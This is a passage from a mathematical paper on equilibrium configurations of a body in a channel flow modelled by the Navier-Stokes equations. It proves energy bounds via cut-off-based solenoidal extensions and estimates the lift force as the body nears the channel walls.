When \(U=1\), we claim that the unique strong solution \(u\) to (2.4) satisfies \[\|u\|_{H^{1}(\Omega_{h})}\leq C\big{(}1+(\varepsilon_{t}(h))^{-3/2}\big{)}\lambda \tag{2.21}\] with \(C>0\) independent of \(h\). To this end, we introduce a different (and explicit) solenoidal extension. Consider the cut-off functions \(\zeta_{l},\zeta_{r}\in C^{\infty}(\mathbb{R}^{2})\), with \(0\leq\zeta_{l},\zeta_{r}\leq 1\), defined piece-wise in the regions of Figure 3 by \[\zeta_{l}(x_{1},x_{2})=\begin{cases}0&\text{in}\quad[-\tau,\tau]\times[-H,H- \frac{\varepsilon_{t}(h)}{2}]\cup[\tau,L]\times[-H,H],\\ 1&\text{in}\quad[-L,-2\tau]\times[-H,H],\\ \zeta_{l}(x_{1})&\text{in}\quad[-2\tau,-\tau]\times[-H,H-\frac{\varepsilon_{t }(h)}{2}],\\ \zeta_{l}(x_{1},x_{2})&\text{in}\quad[-2\tau,-\tau]\times[H-\frac{\varepsilon_ {t}(h)}{2},H],\end{cases} \tag{2.22}\] and \[\zeta_{r}(x_{1},x_{2})=\begin{cases}0&\text{in}\quad[-\tau,\tau]\times[-H,H- \frac{\varepsilon_{t}(h)}{2}]\ \cup\\ &\quad[-L,-\tau]\times[-H,H-\frac{\varepsilon_{t}(h)}{4}],\\ 1&\text{in}\quad[2\tau,L]\times[-H,H-\frac{\varepsilon_{t}(h)}{4}],\\ \zeta_{r}(x_{1})&\text{in}\quad[\tau,2\tau]\times[-H,H-\frac{\varepsilon_{t }(h)}{2}],\\ \zeta_{r}(x_{1},x_{2})&\text{in}\quad[-\tau,2\tau]\times[H-\frac{\varepsilon_ {t}(h)}{2},H-\frac{\varepsilon_{t}(h)}{4}],\\ 1-\zeta_{l}&\text{in}\quad[-L,L]\times[H-\frac{\varepsilon_{t}(h)}{4},H]. \end{cases} \tag{2.23}\] Then, letting \(\nabla^{\perp}=(-\partial_{2},\partial_{1})\), consider the vector field \(s:R\to\mathbb{R}^{2}\) defined by \[s(x_{1},x_{2}):=-\lambda\nabla^{\perp}\left(\zeta_{l}(x_{1},x_{2})\int_{-H}^{ x_{2}}V_{\text{in}}(z)dz+\zeta_{r}(x_{1},x_{2})\int_{-H}^{x_{2}}V_{\text{out}}(z)dz \right), \tag{2.24}\] Figure 3. The cut-off functions \(\zeta_{l}\) (left) and \(\zeta_{r}\) (right) on \(\overline{R}\) when \(U=1\). which is solenoidal and satisfies the boundary conditions in (2.4). Rewriting \(s\) as \[s(x_{1},x_{2})=\lambda\left(-\nabla^{\perp}\zeta_{l}\int_{-H}^{x_{2}}V_{\rm in}- \nabla^{\perp}\zeta_{r}\int_{-H}^{x_{2}}V_{\rm out}+(\zeta_{l}V_{\rm in}+\zeta_ {r}V_{\rm out})e_{1}\right),\] its partial derivatives read \[\partial_{1}s=\lambda\left(-\nabla^{\perp}\partial_{1}\zeta_{l}\int_{-H}^{x_{2 }}V_{\rm in}-\nabla^{\perp}\partial_{1}\zeta_{r}\int_{-H}^{x_{2}}V_{\rm out}+( \partial_{1}\zeta_{l}V_{\rm in}+\partial_{1}\zeta_{r}V_{\rm out})e_{1}\right)\,,\] \[\partial_{2}s=\lambda\bigg{(}-\nabla^{\perp}\partial_{2}\zeta_{l}\int_{-H}^{x_ {2}}V_{\rm in}-\nabla^{\perp}\partial_{2}\zeta_{r}\int_{-H}^{x_{2}}V_{\rm out }-\nabla^{\perp}\zeta_{l}V_{\rm in}-\nabla^{\perp}\zeta_{r}V_{\rm out}\] Using that \(V_{\rm in},V_{\rm out}\in W^{2,\infty}(-H,H)\) and that \(\zeta_{l},\zeta_{r}\) are smooth, it follows that \[\begin{split}\|s\|_{L^{\infty}(\Omega_{h})},\|s\|_{L^{2}(\Omega_ {h})},\,\|s\|_{L^{4}(\Omega_{h})},\,\,\|\nabla s\|_{L^{2}(\Omega_{h})},\,\, \|\Delta s\|_{L^{2}(\Omega_{h})}\leq C_{h}\lambda,\\ \|s\cdot\nabla s\|_{L^{2}(\Omega_{h})}\leq C_{h}\lambda^{2}\leq C _{h}\lambda.\end{split} \tag{2.25}\] We need to quantify the dependence of \(C_{h}>0\) on \(\varepsilon_{b}(h)\) and \(\varepsilon_{t}(h)\). On the one hand, we notice that, by construction, both \(\zeta_{l}\) and \(\zeta_{r}\) depend on \(x_{2}\) only in \[\Omega_{\varepsilon_{t}(h)}:=[-2\tau,2\tau]\times[H-\tfrac{\varepsilon_{t}(h) }{2},H]. 
\tag{2.26}\] In this domain the \(x_{1}\)-derivatives of \(\zeta_{l}\) and \(\zeta_{r}\) are uniformly bounded with respect to \(h\) while the \(x_{2}\)-derivatives blow-up as \(\varepsilon_{t}(h)\) goes to zero, for instance we have \[|\partial_{2}\zeta_{l}|,|\partial_{2}\zeta_{r}|\leq C(\varepsilon_{t}(h))^{-1 },\qquad|\partial_{2}^{2}\zeta_{r}|,|\partial_{2}^{2}\zeta_{l}|\leq C( \varepsilon_{t}(h))^{-2}.\] Therefore, in \(\Omega_{\varepsilon_{t}(h)}\) \[|s|\leq C(1+ (\varepsilon_{t}(h))^{-1})\lambda,\quad|\partial_{1}s|\leq C(1+ (\varepsilon_{t}(h))^{-1})\lambda,\] \[|\partial_{2}s|\leq C((\varepsilon_{t}(h))^{-1}+(\varepsilon_{t} (h))^{-2})\lambda.\] On the other hand, the cut-off functions depend only on \(x_{1}\) in \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}\) and their \(x_{1}\) and \(x_{2}\)-derivatives are uniformly bounded with respect to \(h\). Therefore, in \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}\) \[|s|,|\partial_{1}s|,|\partial_{2}s|\leq C\lambda.\] Gathering all together, we refine the bounds in (2.25) as \[\begin{split}\|s\|_{L^{\infty}(\Omega_{h})}&\leq C (1+(\varepsilon_{t}(h))^{-1})\lambda,\\ \|s\|_{L^{2}(\Omega_{h})}&\leq C\lambda+C\left(\int_ {\Omega_{\varepsilon_{t}(h)}}(\varepsilon_{t}(h))^{-2}\right)^{1/2}\lambda \leq C(1+(\varepsilon_{t}(h))^{-1/2})\lambda,\\ \|s\|_{L^{4}(\Omega_{h})}&\leq C(1+(\varepsilon_{t} (h))^{-3/4})\lambda,\qquad\|\nabla s\|_{L^{2}(\Omega_{h})}\leq C(1+( \varepsilon_{t}(h))^{-3/2})\lambda,\\ \|\Delta s\|_{L^{2}(\Omega_{h})},\,\,\|s\cdot\nabla s\|_{L^{2}( \Omega_{h})}\leq C(1+(\varepsilon_{t}(h))^{-5/2})\lambda,\end{split} \tag{2.27}\] with all the constants \(C>0\) independent of \(h\). Then, testing (2.12) with \(v=u-s\) we obtain \[\mu\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}=-\int_{\Omega_{h}}v\cdot\nabla s\cdot v- \int_{\Omega_{h}}s\cdot\nabla s\cdot v-\mu\int_{\Omega_{h}}\nabla s:\nabla v \tag{2.28}\] We want to estimate, when possible, only \(s\) and not \(\nabla s\) since the bounds for \(s\) are less singular in terms of \(\varepsilon_{t}(h)\). Hence, since \(\nabla\cdot v=\nabla\cdot s=0\) and using integration by parts, we rewrite (2.28) as \[\mu\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}= \int_{\Omega_{h}}v\cdot\nabla v\cdot s+\int_{\Omega_{h}}s\cdot \nabla v\cdot s-\mu\int_{\Omega_{h}}\nabla s:\nabla v. \tag{2.29}\] We split the first integral in the right-hand side over \(\Omega_{\varepsilon_{t}(h)}\) and \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}\). On the one hand, since \(v_{|_{\Gamma_{t}}}=0\), Poincare inequality \[\|v\|_{L^{2}(\Omega_{\varepsilon_{t}(h)})}\leq\frac{\varepsilon_{t}(h)}{2} \|\nabla v\|_{L^{2}(\Omega_{\varepsilon_{t}(h)})},\] and Holder inequality yield \[\int_{\Omega_{\varepsilon_{t}(h)}}(v\cdot\nabla v)\cdot s \leq\|v\|_{L^{2}(\Omega_{\varepsilon_{t}(h)})}\|\nabla v\|_{L^{2 }(\Omega_{\varepsilon_{t}(h)})}\|s\|_{L^{\infty}(\Omega_{\varepsilon_{t}(h)})}\] \[\leq C\varepsilon_{t}(h)\|\nabla v\|_{L^{2}(\Omega_{\varepsilon_ {t}(h)})}^{2}(1+(\varepsilon_{t}(h))^{-1})\lambda\leq C\lambda\|\nabla v\|_{L ^{2}(\Omega_{\varepsilon_{t}(h)})}^{2},\] where we used that \(\|s\|_{L^{\infty}(\Omega_{\varepsilon_{t}(h)})}\leq C(1+(\varepsilon_{t}(h))^ {-1})\lambda\) and \(\varepsilon_{t}(h)\leq 2H-\delta_{b}-\delta_{t}\). 
On the other hand, since \(v_{|_{\Gamma_{l},\Gamma_{r}}}=0\), Poincare and Holder inequalities yield \[\int_{\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}}(v\cdot \nabla v)\cdot s \leq\|v\|_{L^{2}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)}) }\|\nabla v\|_{L^{2}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)})}\|s\|_{ L^{\infty}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)})}\] \[\leq C\lambda\|\nabla v\|_{L^{2}(\Omega_{h}\setminus\Omega_{ \varepsilon_{t}(h)})}^{2},\] where we used that \(\|s\|_{L^{\infty}(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(h)})}\leq C\lambda\). Therefore, from (2.27) and (2.29) we infer \[\mu\|\nabla v\|_{L^{2}(\Omega_{h})}^{2} \leq C\lambda\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}+\|s\|_{L^{4}( \Omega_{h})}^{2}\|\nabla v\|_{L^{2}(\Omega_{h})}+\mu\|\nabla s\|_{L^{2}( \Omega_{h})}\|\nabla v\|_{L^{2}(\Omega_{h})}\] \[\leq C\lambda\|\nabla v\|_{L^{2}(\Omega_{h})}^{2}+C(1+(\varepsilon _{t}(h))^{-3/2})(\lambda+\lambda^{2})\|\nabla v\|_{L^{2}(\Omega_{h})}.\] Then, for \(\lambda\in[0,\Lambda)\) with \(\Lambda\) as in (2.20) we have \[\|\nabla v\|_{L^{2}(\Omega_{h})}\leq C(1+(\varepsilon_{t}(h))^{-3/2})\lambda \tag{2.30}\] and \[\|u\|_{H^{1}(\Omega_{h})}\leq\|\nabla v\|_{L^{2}(\Omega_{h})}+\|s\|_{H^{1}( \Omega_{h})}\leq C(1+(\varepsilon_{t}(h))^{-3/2})\lambda,\] which proves (2.21). When \(U=0\), we claim that the unique strong solution \(u\) to (2.4) satisfies \[\|u\|_{H^{1}(\Omega_{h})}\leq C\lambda \tag{2.31}\] with \(C>0\) independent of \(h\). In this case, we shall define the cut-off functions and the solenoidal extension differently depending if \(h\leq 0\) or \(h>0\). If \(h\leq 0\), we define \(\zeta_{l}\), \(\zeta_{r}\) as in (2.22)-(2.23) (see Figure 4 below) replacing \(\varepsilon_{t}(h)\) with the distance of to \(\Gamma_{t}\), namely \(\varepsilon_{t}(0)=H-\delta_{t}\). The solenoidal extension \(s\) is then defined as in (2.24). By construction both \(\zeta_{l}\) and \(\zeta_{r}\) depend on \(x_{2}\) only in \(\Omega_{\varepsilon_{t}(0)}\), defined as in (2.26) with \(\varepsilon_{t}(h)\) replaced by \(\varepsilon_{t}(0)\). In this domain both \(x_{1}\) and \(x_{2}\)-derivatives of \(\zeta_{l}\) and \(\zeta_{r}\) are uniformly bounded with respect to \(h\), for instance we have \[|\partial_{2}\zeta_{l}|,|\partial_{2}\zeta_{r}|\leq C(\varepsilon_{t}(0))^{-1} \leq C,\qquad|\partial_{2}^{2}\zeta_{r}|,|\partial_{2}^{2}\zeta_{l}|\leq C( \varepsilon_{t}(0))^{-2}\leq C.\] Since in \(\Omega_{h}\setminus\Omega_{\varepsilon_{t}(0)}\) the cut-off functions depend only on \(x_{1}\), we infer that \(s\), \(\partial_{1}s\) and \(\partial_{2}s\) are uniformly bounded with respect to \(h\) in all \(\Omega_{h}\) and \[\|s\|_{L^{\infty}(\Omega_{h})},\|s\|_{L^{2}(\Omega_{h})},\|s\|_{L^{4}(\Omega_ {h})},\|\nabla s\|_{L^{2}(\Omega_{h})}\leq C\lambda. \tag{2.32}\] Repeating the same computations as in the case \(U=1\) and using (2.32), we obtain (2.31) for \(h\leq 0\). If \(h>0\), we make a vertical reflection \(x_{2}\mapsto-x_{2}\) and we consider the new cut-off functions defined piece-wise in the regions of Figure 4, where \(\varepsilon_{b}(0)=H-\delta_{b}\). Then, we consider the vector field \(s:R\to\mathbb{R}^{2}\) defined by \[s(x_{1},x_{2}):=\lambda\nabla^{\perp}\left(\zeta_{l}(x_{1},x_{2})\int_{x_{2}} ^{H}V_{\rm in}(z)dz+\zeta_{r}(x_{1},x_{2})\int_{x_{2}}^{H}V_{\rm out}(z)dz \right),\] which is solenoidal and satisfies the boundary conditions in (2.4). 
By the same argument used when \(h\leq 0\), \(s\), \(\partial_{1}s\) and \(\partial_{2}s\) are uniformly bounded with respect to \(h\) in \(\Omega_{h}\). Therefore, using again (2.32), we obtain (2.31) for \(h<0\). _Remark 2.3_.: We stated (2.7) and (2.8) only in case of uniqueness because, in what follows, \(\lambda\) will be taken small and higher powers of \(\lambda\) can be upper estimated with the first power. The reflection method used to obtain the regularity result has its own interest. The rectangular shape of the domain is crucial and the technique fails for other polygons. However, in the case of convex polygons, in particular also for a rectangle, one can obtain the more \(C^{\infty}\)-regularity result by using Theorem 2 in [11]. ## 3. Equilibrium configurations of a FSI problem By Theorem 2.2, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\) there exists a unique strong solution \((u,p)=(u(\lambda,h),p(\lambda,h))\) to (2.4). The fluid described by \((u,p)\) in \(\Omega_{h}\) exerts on \(B_{h}\) a force perpendicular to the direction of the inflow, called _lift_ (see [14]). Since the inflow in (2.4) is horizontal, the lift is vertical and given by \[L(\lambda,h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n, \tag{3.1}\] where \(\mathbb{T}\) is the fluid stress tensor, namely \[\mathbb{T}(u,p):=\mu(\nabla u+\nabla u^{T})-p\mathbb{I}\,,\] and \(n\) is the unit outward normal vector to \(\partial\Omega_{h}\), which, on \(\partial B_{h}\), points towards the interior of \(B_{h}\). The regularity of the solution (see Theorem 2.2) and the smoothness of \(\partial B_{h}\) yield \(\mathbb{T}(u,p)_{|_{\partial B_{h}}}\in H^{1/2}(\partial B_{h})\subset L^{1} (\partial B_{h})\), hence the integral in (3.1) is finite. In fact, the lift can also be defined for merely weak solutions, see (7.5) in Section 7. Note that (3.1) holds for any \(\lambda\geq 0\) and any solution to (2.4) but our main result on the FSI problem focuses on small inflows, see Theorem 3.1. This is why in this section we restrict to \(\lambda\in[0,\Lambda)\). Aiming to model, in particular, a wind flow hitting a suspension bridge, the body \(B\) may also be subject to a (possibly nonsmooth) vertical restoring force \(f\) tending to maintain \(B\) in the equilibrium position \(B_{0}\) (for \(h=0\)); see Section 7. We assume that \(f\) depends only on the position \(h\), that \(f\in C^{0}(-H+\delta_{b},H-\delta_{t})\) with \(f(0)=0\) and \[\exists\gamma>0\quad\text{s.t.}\quad\frac{f(h_{1})-f(h_{2})}{h_{1}-h_{2}}\geq \gamma\quad\forall h_{1},h_{2}\in(-H+\delta_{b},H-\delta_{t}),\ h_{1}\neq h_{2}. \tag{3.2}\] Moreover, we assume that there exists \(K>0\) such that \[\begin{split}&\limsup_{h\to-H+\delta_{b}}\ f(h)(H-\delta_{b}+h)^{3/2}\leq-K,\\ &\liminf_{h\to H-\delta_{t}}\ \frac{f(h)}{\max\{(H-\delta_{t}-h)^{ -3/2},U(H-\delta_{t}-h)^{-3}\}}\geq K.\end{split} \tag{3.3}\] The assumption (3.3) is somehow technical and prevents collisions of \(B\) with the horizontal boundary \(\Gamma_{b}\cup\Gamma_{t}\), at least for small inflow/outflow. It can probably be relaxed but, so far, only few (numerical) investigations on the effect of proximity to collisions of hydrodynamic forces (such as the lift), acting on non-spherical bodies, have been tackled, see [18] and references therein. The presence of \(U\) in (3.3) highlights the different behavior of \(f\) when \(B\) is close to \(\Gamma_{t}\) for \(U=0\) or \(U=1\). In the first case, \(f\) has the same strength close to \(\Gamma_{b}\) and \(\Gamma_{t}\). 
Conversely, for \(U=1\), the asymmetry of the boundary conditions requires a different strength of \(f\), which is stronger when \(B\) is close to \(\Gamma_{t}\) than when \(B\) is close to \(\Gamma_{b}\). Overall, (3.2)-(3.3) model the fact that \(B\) is not allowed to go too far away from the equilibrium position \(B_{0}\). Since we are interested in the equilibrium configurations of the FSI problem, we consider the boundary-value problem (2.4) coupled with a compatibility condition stating that the restoring force balances the lift force, namely \[\begin{split}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\quad\nabla\cdot u =0\quad\text{in}\quad\Omega_{h}\\ u_{|_{\partial B_{h}}}\!=\!u_{|_{\Gamma_{b}}}\!=0,\quad u_{|_{ \Gamma_{t}}}\!=\lambda Ue_{1},\quad u_{|_{\Gamma_{l}}}\!=\lambda V_{\text{in}} (x_{2})e_{1},\quad u_{|_{\Gamma_{r}}}\!=\lambda V_{\text{out}}(x_{2})e_{1},\\ f(h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n.\end{split} \tag{3.4}\] Our main result concerns the existence and uniqueness of the solution to (3.4) for small values of \(\lambda\): **Theorem 3.1**.: _Let \(f\in C^{0}(-H+\delta_{b},H-\delta_{t})\) satisfy (3.2)-(3.3) with \(f(0)=0\) and \(V_{\text{in}}\), \(V_{\text{out}}\in W^{2,\infty}(-H,H)\) satisfy (2.3) with (2.5). There exists \(\Lambda_{1}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that for \(\lambda\in[0,\Lambda_{1})\) the FSI problem (3.4) admits a unique solution \((u(\lambda,h),p(\lambda,h),h)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h}) \times(-H+\delta_{b},H-\delta_{t})\) given by_ \[(u(\lambda,\mathfrak{h}(\lambda)),p(\lambda,\mathfrak{h}(\lambda)),\mathfrak{ h}(\lambda)).\] The proof of Theorem 3.1 is given in Section 5. It is fairly delicate because if \(U=0\) (as for symmetric inflow/outflow), then from (2.21) we infer that the \(H^{1}\)-norm is uniformly bounded with respect to \(h\). However, if \(U=1\), the same norm obviously blow up when \(B_{h}\) approaches \(\Gamma_{t}\), which affects the bounds for the lift in (3.1). As already mentioned, very little is known when a body approaches a collision, see again [18] and references therein. Therefore, the next statement has its own independent interest, it provides some upper bounds and shows that, probably, the lift behaves differently for homogeneous and inhomogeneous boundary data. **Theorem 3.2**.: _Assume (2.5) and consider \(\Lambda\) as in Theorem 2.2. Let \((u,p)\) be the unique strong solution to (2.4) and let \(L(\lambda,h)\) be as in (3.1). There exists \(C>0\) such that, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\),_ \[|L(\lambda,h)|\leq C\Big{(}(\varepsilon_{b}(h))^{-3/2}+\max\{(\varepsilon_{t }(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\}\Big{)}\lambda \tag{3.5}\] _with \(\varepsilon_{b}(h)\) and \(\varepsilon_{t}(h)\) defined in (2.6)._ The proof of Theorem 3.2 is given in the next section. ## 4. Proof of Theorem 3.2 We rewrite the lift (3.1), which is a boundary integral, as a volume integral. This can be done by considering \(w\in H^{1}(\Omega_{h})\) that satisfies \[\nabla\cdot w=0\quad\text{in}\quad\Omega_{h},\qquad w_{|_{\partial B_{h}}}=e_ {2},\qquad w_{|_{\partial R}}=0. \tag{4.1}\] The Divergence Theorem ensures that (4.1) admits infinitely many solutions. 
Testing (2.4) with one such solution \(w\) yields \[\int_{\Omega_{h}}u\cdot\nabla u\cdot w=\int_{\Omega_{h}}\nabla\cdot\mathbb{T} (u,p)\cdot w=-\int_{\Omega_{h}}\nabla u:\nabla w+\int_{\partial\Omega_{h}} \mathbb{T}(u,p)n\cdot w\] and, using the boundary conditions on \(w\), \[-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(u,p)n=-\int_{\Omega_{h}}u\cdot \nabla u\cdot w-\int_{\Omega_{h}}\nabla u:\nabla w. \tag{4.2}\] Among the infinitely many solutions of (4.1), we select one obtained by using a solenoidal extension similar to the ones introduced in Section 2. We consider a cut-off function \(\chi\in C^{\infty}(\overline{R})\) with \(0\leq\chi\leq 1\) such that \[\chi(x_{1},x_{2})=\begin{cases}1&\text{in}\quad[-\tau,\tau]\times[h-\delta_{b},h +\delta_{t}],\\ 0&\text{in}\quad\Omega_{h}\setminus([-2\tau,2\tau]\times[h-\delta_{b}-\frac{ \varepsilon_{b}(h)}{2},h+\delta_{t}+\frac{\varepsilon_{t}(h)}{2}]),\\ \chi(x_{1})&\text{in}\quad([-2\tau,-\tau]\cup[\tau,2\tau])\times[h-\delta_{b}, h+\delta_{t}].\end{cases}\] We put \(w=\nabla^{\perp}(x_{1}\chi)\). Clearly \(w\in H^{1}(\Omega_{h})\) satisfies (4.1) and supp \(w\subseteq\Omega_{w}=\Omega_{w,b}\cup\Omega_{w,c}\cup\Omega_{w,t}\) with \[\Omega_{w,b} :=[-2\tau,2\tau]\times[h-\delta_{b}-\tfrac{\varepsilon_{b}(h)}{ 2},h-\delta_{b}],\qquad\Omega_{w,c}:=[-2\tau,2\tau]\times[h-\delta_{b},h+ \delta_{t}],\] \[\Omega_{w,t} :=[-2\tau,2\tau]\times[h+\delta_{t},h+\delta_{t}+\tfrac{ \varepsilon_{t}(h)}{2}].\] Moreover, from the definition of \(\chi\) it follows that \(w\) and its \(x_{1}\) and \(x_{2}\)-derivatives are uniformly bounded with respect to \(h\) in \(\Omega_{w,c}\), while in \(\Omega_{w,b}\) \[|w|\leq C(1+(\varepsilon_{b}(h))^{-1}),\quad|\partial_{1}w|\leq(1+( \varepsilon_{b}(h))^{-1}),\] \[|\partial_{2}w|\leq((\varepsilon_{b}(h))^{-1}+(\varepsilon_{b}(h) )^{-2}) \tag{4.3}\] and in \(\Omega_{w,t}\) \[|w|\leq C(1+(\varepsilon_{t}(h))^{-1}),\quad|\partial_{1}w|\leq( 1+(\varepsilon_{t}(h))^{-1}),\] \[|\partial_{2}w|\leq((\varepsilon_{t}(h))^{-1}+(\varepsilon_{t}(h) )^{-2}). \tag{4.4}\] \(B_{h}\) _close to \(\Gamma_{b}\)._ We consider the case when \(h\) is close to \(-H+\delta_{b}\), hence \(\varepsilon_{b}(h)\) is close to zero. This implies that \(\varepsilon_{t}(h)\geq 1\) and the bounds in (4.4) become uniform. Choosing in (4.2) the previously constructed \(w\), we observe that the integrals in the right-hand side are defined only on \(\Omega_{w}\). Let us split these integrals over the regions \(\Omega_{w,b}\), which is shrinking as \(\varepsilon_{b}(h)\) goes to zero, and \(\Omega_{w}\setminus\Omega_{w,b}\). On the one hand, Holder inequality and (2.7) yield \[\begin{split}&\left|\int_{\Omega_{w}\setminus\Omega_{w,b}}u \cdot\nabla u\cdot w+\int_{\Omega_{w}\setminus\Omega_{w,b}}\nabla u:\nabla w \right|\\ &\leq C\|u\|_{H^{1}(\Omega_{h})}^{2}\|w\|_{L^{\infty}(\Omega_{w} \setminus\Omega_{w,b})}+\|\nabla u\|_{L^{2}(\Omega_{h})}\|\nabla w\|_{L^{2}( \Omega_{w}\setminus\Omega_{w,b})}\\ &\leq C(\|u\|_{H^{1}(\Omega_{h})}^{2}+\|u\|_{H^{1}(\Omega_{h})}) \leq C\lambda\end{split} \tag{4.5}\] for \(\lambda\in[0,\Lambda)\), using that \(w\) and its derivatives are uniformly bounded with respect to \(h\) in \(\Omega_{w}\setminus\Omega_{w,b}\). 
On the other hand, since \(w\equiv 0\) in \(\Omega_{w,b}^{0}:=[-2\tau,2\tau]\times[-H,h-\delta_{b}-\tfrac{\varepsilon_{b}(h)}{2}]\) and \(u_{|_{\Gamma_{b}}}=0\), Poincare inequality for \(u\) in \(\Omega_{w,b}\cup\Omega_{w,b}^{0}\), the Holder inequality and (2.7) yield \[\begin{split}&\left|\int_{\Omega_{w,b}}u\cdot\nabla u\cdot w\right|=\left|\int_{\Omega_{w,b}\cup\Omega_{w,b}^{0}}u\cdot\nabla u\cdot w\right|\\ &\leq\varepsilon_{b}(h)\|\nabla u\|_{L^{2}(\Omega_{w,b}\cup\Omega_{w,b}^{0})}^{2}\|w\|_{L^{\infty}(\Omega_{w,b})}\leq C\|u\|_{H^{1}(\Omega_{h})}^{2}\leq C\lambda\end{split} \tag{4.6}\] and \[\left|\int_{\Omega_{w,b}}\nabla u:\nabla w\right|\leq\|u\|_{H^{1}(\Omega_{h})}\|\nabla w\|_{L^{2}(\Omega_{w,b})}\leq C(\varepsilon_{b}(h))^{-3/2}\lambda, \tag{4.7}\] for \(\lambda\in[0,\Lambda)\), using that \(\|w\|_{L^{\infty}(\Omega_{w,b})}\leq C(\varepsilon_{b}(h))^{-1}\) and \(\|\nabla w\|_{L^{2}(\Omega_{w,b})}\leq C(\varepsilon_{b}(h))^{-3/2}\) for \(\varepsilon_{b}(h)\) close to zero, due to (4.3). Putting together (4.5)-(4.7), we deduce that there exists \(\eta_{b}>0\) sufficiently small such that, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},-H+\delta_{b}+\eta_{b})\), \[|L(\lambda,h)|\leq C(\varepsilon_{b}(h))^{-3/2}\lambda. \tag{4.8}\] We remark that the same blow-up rate in (4.8) could be obtained without taking advantage of Poincare inequality in (4.6) but by directly using the embedding \(u\in H^{1}\subset L^{4}\). This idea, however, will be crucial to obtain a better blow-up rate for the lift in the case when the body is close to \(\Gamma_{t}\). \(B_{h}\) _close to \(\Gamma_{t}\)._ We consider the case when \(h\) is close to \(H-\delta_{t}\), hence \(\varepsilon_{t}(h)\) is close to zero. Analogously to what was done in the previous case, we split the integrals over the regions \(\Omega_{w,t}\), which is shrinking as \(\varepsilon_{t}(h)\) goes to zero, and \(\Omega_{w}\setminus\Omega_{w,t}\). On the one hand, Holder inequality yields \[\left|\int_{\Omega_{w}\setminus\Omega_{w,t}}u\cdot\nabla u\cdot w+\int_{\Omega_{w}\setminus\Omega_{w,t}}\nabla u:\nabla w\right|\] \[\leq C\|u\|_{H^{1}(\Omega_{h})}^{2}\|w\|_{L^{\infty}(\Omega_{w}\setminus\Omega_{w,t})}+\|\nabla u\|_{L^{2}(\Omega_{h})}\|\nabla w\|_{L^{2}(\Omega_{w}\setminus\Omega_{w,t})}\] \[\leq C(\|u\|_{H^{1}(\Omega_{h})}^{2}+\|u\|_{H^{1}(\Omega_{h})})\] using that \(w\) and its derivatives are uniformly bounded with respect to \(h\) in \(\Omega_{w}\setminus\Omega_{w,t}\).
On the other hand, since \(w\equiv 0\) in \(\Omega_{w,t}^{0}:=[-2\tau,2\tau]\times[h+\delta_{t}+\frac{\varepsilon_{t}(h)}{2},H]\) and \(u=v+s\) with \(v_{|_{\Gamma_{t}}}=0\), Poincare inequality for \(v\) in \(\Omega_{w,t}\cup\Omega_{w,t}^{0}\) and Holder inequality yield \[\left|\int_{\Omega_{w,t}}u\cdot\nabla u\cdot w\right|=\left|\int_{\Omega_{w,t}\cup\Omega_{w,t}^{0}}v\cdot\nabla u\cdot w+\int_{\Omega_{w,t}\cup\Omega_{w,t}^{0}}s\cdot\nabla u\cdot w\right|\] \[\leq\varepsilon_{t}(h)\|\nabla v\|_{L^{2}(\Omega_{h})}\|\nabla u\|_{L^{2}(\Omega_{h})}\|w\|_{L^{\infty}(\Omega_{w,t})}+\|s\|_{L^{2}(\Omega_{h})}\|\nabla u\|_{L^{2}(\Omega_{h})}\|w\|_{L^{\infty}(\Omega_{w,t})}\] \[\leq C\|\nabla v\|_{L^{2}(\Omega_{h})}\|u\|_{H^{1}(\Omega_{h})}+C\|s\|_{L^{2}(\Omega_{h})}\|u\|_{H^{1}(\Omega_{h})}(\varepsilon_{t}(h))^{-1}\] and \[\left|\int_{\Omega_{w,t}}\nabla u:\nabla w\right|\leq\|u\|_{H^{1}(\Omega_{h})}\|\nabla w\|_{L^{2}(\Omega_{w,t})}\leq\|u\|_{H^{1}(\Omega_{h})}(\varepsilon_{t}(h))^{-3/2},\] using that \(\|w\|_{L^{\infty}(\Omega_{w,t})}\leq C(\varepsilon_{t}(h))^{-1}\) and \(\|\nabla w\|_{L^{2}(\Omega_{w,t})}\leq C(\varepsilon_{t}(h))^{-3/2}\) for \(\varepsilon_{t}(h)\) close to zero, due to (4.4). Now we shall distinguish the cases \(U=1\) and \(U=0\). When \(U=1\), using (2.7), (2.27) and (2.30) we obtain, for \(\lambda\in[0,\Lambda)\), \[\left|\int_{\Omega_{w}\setminus\Omega_{w,t}}u\cdot\nabla u\cdot w+\int_{\Omega_{w}\setminus\Omega_{w,t}}\nabla u:\nabla w\right|\leq C(\varepsilon_{t}(h))^{-3}\lambda \tag{4.9}\] and \[\left|\int_{\Omega_{w,t}}u\cdot\nabla u\cdot w\right|\leq C(\varepsilon_{t}(h))^{-3}\lambda,\quad\left|\int_{\Omega_{w,t}}\nabla u:\nabla w\right|\leq C(\varepsilon_{t}(h))^{-3}\lambda. \tag{4.10}\] When \(U=0\), using (2.7) and (2.32), we obtain, for \(\lambda\in[0,\Lambda)\), \[\left|\int_{\Omega_{w}\setminus\Omega_{w,t}}u\cdot\nabla u\cdot w+\int_{\Omega_{w}\setminus\Omega_{w,t}}\nabla u:\nabla w\right|\leq C\lambda \tag{4.11}\] and \[\left|\int_{\Omega_{w,t}}u\cdot\nabla u\cdot w\right|\leq C(\varepsilon_{t}(h))^{-1}\lambda,\quad\left|\int_{\Omega_{w,t}}\nabla u:\nabla w\right|\leq 